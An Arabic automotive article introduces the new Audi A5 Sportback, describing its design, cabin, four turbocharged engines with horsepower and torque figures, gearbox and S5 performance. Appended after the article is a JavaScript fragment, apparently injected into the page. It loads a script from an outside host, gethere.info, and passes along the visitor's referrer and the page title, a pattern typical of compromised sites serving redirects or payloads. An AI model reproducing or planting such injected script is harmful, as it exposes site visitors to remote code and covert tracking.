أودي A5 Sportback الجديدة

يطل علينا اليوم جيل جديد بالكامل من سيارة اودي الكوبيه الرياضي ذات الأربعة أبواب A5 Sportback التي خضعة لعملية تصميم جديدة بالكامل سواء كان لناحية جسمها الخارجي او مقصورة ركابها.

تتميز هذه السيدان الرياضية بخطوطها الرشيقة المشابهة لتلك المتوفرة على سيارات الكوبيه على غرار الجيل السابق منها لكنها اليوم أصبحت أكثر انسيابية وجمالاً كيفما نظرنا اليها.

من الداخل لدينا مقصورة عصرية وانيقة تتميز بوفرة تجهيزاتها ورحابتها بالنسبة لسيارة من هذه الفئة وعي قادر على استيعاب خمسة ركاب بالتمام والكمال.

تتوفر أودي A5 Sportback مع أربعة خيارات من المحركات. المحركات الثلاث الأولى جميعها مؤلفة من 4 أسطوانات سعة 2 ليتر مع توربو، يولد مع النسخة الأولى قوة 170 حصان و270 نيوتن متر من عزم الدوران. النسخة الثانية من هذا المحرك يولد قوة 190 حصان و320 نيوتن متر من عزم الدوران. اما النسخة الثالثة تصبح القوة 252 حصان وعزم الدوران يرتفع إلى 370 نيوتن متر.

اما المحرك الرابع والمتوفر على نسخة S5 Sportback مؤلف من 6 أسطوانات على شكل V سعة 3 ليتر مع توربو قادر على توليد قوة 350 حصان و500 نيوتن متر من عزم الدوران.

تنتقل قوة هذا المحرك الجديد إلى العجلات الأربع الدافعة عبر علبة تروس أوتوماتيكية مؤلفة من 7 نسب امامية.

اما بخصوص التأدية، تستطيع أودي S5 Sportback الانطلاق من صفر إلى 100 كلم/ساعة في خلال 4.7 ثواني بينما حددت سرعتها القصوى بـ 250 كلم/ساعة.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;